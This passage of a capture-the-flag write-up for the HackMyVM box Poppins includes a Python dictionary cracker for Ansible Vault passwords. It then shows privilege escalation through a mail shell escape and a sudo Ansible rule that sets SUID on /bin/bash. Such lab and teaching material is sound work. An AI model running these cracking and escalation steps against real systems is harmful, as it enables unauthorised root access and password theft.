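Why the offline crack works is worth seeing in code. The following is an added example, not part of the write-up: it reproduces what ansible2john and john do internally for a 1.1/1.2 AES256 vault. The vault body is hex of `salt_hex\nhmac_hex\nciphertext_hex`; the password is stretched with PBKDF2-HMAC-SHA256 (10000 iterations, 80 bytes) into key1 | key2 | iv, and HMAC-SHA256(key2, ciphertext) must equal the stored HMAC. A matching HMAC proves the password without decrypting anything, so the check needs only the standard library; actual decryption (AES-256-CTR with key1/iv) is left to `ansible-vault view`. The sample vault from `make_sample_vault` carries a constructed, meaningless ciphertext with a valid HMAC for a chosen password; it is not the box's vault.txt.

```python
"""Offline password check for Ansible Vault files (formats 1.1/1.2, AES256).

Added example, not part of the write-up. It reproduces what the
ansible2john + john step does: parse the vault text, derive
key1 | key2 | iv = PBKDF2-HMAC-SHA256(password, salt, 10000 iterations,
80 bytes), and compare HMAC-SHA256(key2, ciphertext) with the stored HMAC.
The sample vault built by `make_sample_vault` carries a constructed,
meaningless ciphertext with a valid HMAC for a chosen password.
"""
import binascii
import hashlib
import hmac
import os
from typing import Iterable, Optional, Tuple

ITERATIONS = 10000           # fixed in Ansible's VaultAES256
KEY_LEN, IV_LEN = 32, 16


def derive(password: bytes, salt: bytes) -> Tuple[bytes, bytes, bytes]:
    """key1 (AES key), key2 (HMAC key), iv, as VaultAES256 derives them."""
    raw = hashlib.pbkdf2_hmac("sha256", password, salt, ITERATIONS,
                              dklen=2 * KEY_LEN + IV_LEN)
    return raw[:KEY_LEN], raw[KEY_LEN:2 * KEY_LEN], raw[2 * KEY_LEN:]


def parse_vault(text: str) -> Tuple[bytes, bytes, bytes]:
    """Return (salt, stored_hmac, ciphertext). The body is hex of
    'salt_hex\\nhmac_hex\\nciphertext_hex', wrapped at 80 columns."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    fields = lines[0].split(";")
    if fields[0] != "$ANSIBLE_VAULT" or fields[1] not in ("1.1", "1.2") or fields[2] != "AES256":
        raise ValueError("unsupported vault header: " + lines[0])
    payload = binascii.unhexlify("".join(lines[1:]))
    salt_hex, hmac_hex, ct_hex = payload.split(b"\n", 2)
    return tuple(binascii.unhexlify(x) for x in (salt_hex, hmac_hex, ct_hex))


def check_password(text: str, candidate: str) -> bool:
    """True if the candidate reproduces the stored HMAC (no decryption)."""
    salt, stored, ciphertext = parse_vault(text)
    _, key2, _ = derive(candidate.encode(), salt)
    calc = hmac.new(key2, ciphertext, hashlib.sha256).digest()
    return hmac.compare_digest(calc, stored)


def crack(text: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack; each guess costs one PBKDF2 run (10000 rounds)."""
    for word in wordlist:
        if check_password(text, word):
            return word
    return None


def make_sample_vault(password: str, ciphertext: bytes = b"\x00" * 32,
                      salt: Optional[bytes] = None) -> str:
    """Build a syntactically valid 1.1 vault with a correct HMAC. The
    ciphertext is a constructed placeholder, not real encrypted data."""
    salt = salt if salt is not None else os.urandom(32)
    _, key2, _ = derive(password.encode(), salt)
    mac = hmac.new(key2, ciphertext, hashlib.sha256).digest()
    inner = b"\n".join(binascii.hexlify(x) for x in (salt, mac, ciphertext))
    body = binascii.hexlify(inner).decode()
    wrapped = "\n".join(body[i:i + 80] for i in range(0, len(body), 80))
    return "$ANSIBLE_VAULT;1.1;AES256\n" + wrapped + "\n"


if __name__ == "__main__":
    sample = make_sample_vault("javiel")
    # Candidates taken from the rockyou.txt words john printed above.
    print(crack(sample, ["richard!", "nick20", "kiss1", "javiel", "janele"]))  # javiel
```

The 10000 PBKDF2 rounds are what makes john report only ~1800 candidates per second on the box; on a real vault.txt, `check_password(open("vault.txt").read(), "javiel")` would return True and the decrypt step stays with `ansible-vault view`.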

Comparing the sudo rights of the two users shows that michael may run mail as winifred without a password.

image-20260212134007825

The installed version is too old, so the methods shown here do not work.

image-20260212134312438

image-20260212134326955

Here I follow the approach from HackMyVM-Poppins - Skyarrow's blog.

Send an empty mail to winifred so there is a message to read:

sudo -u winifred /usr/bin/mail -s "test" winifred</dev/null

Read the mail as winifred; mail opens its interactive prompt:

sudo -u winifred /usr/bin/mail

Move laterally into winifred's shell: at the mail prompt, `!command` runs the command through a shell, so this gives a bash running as winifred:

!/bin/bash

image-20260212134723394

Check sudo rights again:

winifred@Poppins:/home/michael$ sudo -l
Matching Defaults entries for winifred on Poppins:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User winifred may run the following commands on Poppins:
(ALL) NOPASSWD: /usr/bin/ansible *
winifred@Poppins:/home/michael$

Ansible exists to run system commands on remote hosts or on the local machine, and one of its core modules is the shell module:

-m shell

which is essentially equivalent to

/bin/sh -c "your command"

Because sudo runs /usr/bin/ansible itself as root, every command the shell module executes is also run as root; the `sudo` inside the -a argument below is therefore redundant, which is what the "Consider using become" warning is about.

Set the SUID bit on the local bash:

winifred@Poppins:/home/michael$ sudo /usr/bin/ansible localhost -m shell -a 'sudo chmod u+s /bin/bash'
[WARNING]: No inventory was parsed, only implicit localhost is available
[WARNING]: Consider using 'become', 'become_method', and 'become_user' rather than running sudo
localhost | CHANGED | rc=0 >>

winifred@Poppins:/home/michael$ bash -p
bash-5.0# whoami
root
bash-5.0#

bash drops its effective privileges by default when the effective UID differs from the real UID, so -p (privileged mode) is needed to keep the SUID root.